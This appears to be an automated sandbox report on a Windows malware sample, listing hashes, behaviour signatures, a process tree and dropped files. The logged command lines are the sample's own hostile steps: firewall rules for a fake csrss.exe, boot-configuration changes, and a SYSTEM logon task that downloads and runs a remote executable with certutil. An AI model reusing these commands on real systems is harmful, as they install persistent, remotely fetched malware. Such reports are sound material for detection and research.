Analysis
max time kernel: 4s
max time network: 128s
platform: windows10-2004_x64
resource: win10v2004-20220414-en
submitted: 24-05-2022 13:57
Static task: static1
Behavioral task: behavioral1
  Sample: dd869fd51dc2ace42763d629fc8ed6caf209ddd71b41d6aedd7a7a1ab79ffb9d.exe
  Resource: win7-20220414-en
Behavioral task: behavioral2
  Sample: dd869fd51dc2ace42763d629fc8ed6caf209ddd71b41d6aedd7a7a1ab79ffb9d.exe
  Resource: win10v2004-20220414-en
General
Target: dd869fd51dc2ace42763d629fc8ed6caf209ddd71b41d6aedd7a7a1ab79ffb9d.exe
Size: 3.8MB
MD5: cf300ac61d822819800e96198b91b1c9
SHA1: 9daa6f31bbc1d329bfb4180e33f8c97402868a5b
SHA256: dd869fd51dc2ace42763d629fc8ed6caf209ddd71b41d6aedd7a7a1ab79ffb9d
SHA512: 86837965dce13c2f8da00b19806e18fde09b18913feb9ab3866c8cffb8c5cb6613a79e8c8d514e1a5a18541cc2121c60e7c3efa88ab7c20112e68ddc47d3fdc3
Malware Config
Signatures
- Modifies Windows Firewall (1 TTPs)
- Modifies boot configuration data using bcdedit (1 IoCs)
  Processes: bcdedit.exe (pid 4044)
- Program crash (2 IoCs)
  Processes: WerFault.exe (pid 2924, target pid 2764, target process dd869fd51dc2ace42763d629fc8ed6caf209ddd71b41d6aedd7a7a1ab79ffb9d.exe); WerFault.exe (pid 5048, target pid 2116, target process dd869fd51dc2ace42763d629fc8ed6caf209ddd71b41d6aedd7a7a1ab79ffb9d.exe)
- Creates scheduled task(s) (1 TTPs, 2 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes (indentation follows the parent/child tree reported by the sandbox; each entry lists the image path, then its command line)
- C:\Users\Admin\AppData\Local\Temp\dd869fd51dc2ace42763d629fc8ed6caf209ddd71b41d6aedd7a7a1ab79ffb9d.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\dd869fd51dc2ace42763d629fc8ed6caf209ddd71b41d6aedd7a7a1ab79ffb9d.exe"
  - C:\Users\Admin\AppData\Local\Temp\dd869fd51dc2ace42763d629fc8ed6caf209ddd71b41d6aedd7a7a1ab79ffb9d.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\dd869fd51dc2ace42763d629fc8ed6caf209ddd71b41d6aedd7a7a1ab79ffb9d.exe"
    - C:\Windows\system32\cmd.exe
      command line: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
      - C:\Windows\system32\netsh.exe
        command line: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
    - C:\Windows\system32\cmd.exe
      command line: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\83876a664c4b\83876a664c4b\83876a664c4b.exe" enable=yes"
    - C:\Windows\SysWOW64\WerFault.exe
      command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2116 -s 692
      signature: Program crash
    - C:\Windows\rss\csrss.exe
      command line: C:\Windows\rss\csrss.exe ""
      - C:\Windows\system32\bcdedit.exe
        command line: C:\Windows\Sysnative\bcdedit.exe /v
        signature: Modifies boot configuration data using bcdedit
      - C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        command line: "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
      - C:\Windows\SYSTEM32\schtasks.exe
        command line: schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
        signature: Creates scheduled task(s)
      - C:\Windows\SYSTEM32\schtasks.exe
        command line: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        signature: Creates scheduled task(s)
  - C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2764 -s 856
    signature: Program crash
- C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
- C:\Windows\SysWOW64\WerFault.exe
  command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 2764 -ip 2764
- C:\Windows\system32\netsh.exe
  command line: netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\83876a664c4b\83876a664c4b\83876a664c4b.exe" enable=yes
- C:\Windows\SysWOW64\WerFault.exe
  command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2116 -ip 2116
Network
Downloads
- C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
  Filesize: 233KB
  MD5: f4e16aeaafd025b19e1cc7953d99eea4
  SHA1: dbd9595469aa99b55656030088348f22f0eb8ebe
  SHA256: 3a0040b7daa8b1834fd7b6026c64eaa5d213df422752c28ea10fd027dc4839da
  SHA512: e785cc3cf3d552104eb59b1f900f178c1ce34c41ccb5530a8b93c9dbd7703f1d646913deefa5b5b3ecd0088b129969b15c914ef2132874b7f3809de84a2ccf60
- C:\Windows\rss\csrss.exe
  Filesize: 282KB
  MD5: 6ec88097f2630e5082b02859812e386d
  SHA1: 6f13e04f8c2d1d7fbde949ba6c309ed438ed8a72
  SHA256: fac8ea804a36d647ac09ab94e21bb19a05b2cebd78917116c508da7973499613
  SHA512: 396038a28c3a204b6891c0b95b8b47cf3559756d41fa9b003cab9e5c139197b2f14fe00803a8a75846cf601029788cbae4200fab0a6596d0232bf770af5b0f88
- C:\Windows\rss\csrss.exe
  Filesize: 181KB
  MD5: 24a9dad4c62947204e900fb1d6425c8a
  SHA1: acec4d3b171339e1916aa173005618525c632489
  SHA256: b733206522b752b94ab477776634207676ee7ccf065e4fec0fa172cdf693b30a
  SHA512: 9ef1b1d493a1eba98352ba837ca4ee394463a7e6fe5bf54a7e32853384eebd590e0bfc62f982c39451f8f7912963d84d8b842ad6a3ba53be96a3c13cebca9d6b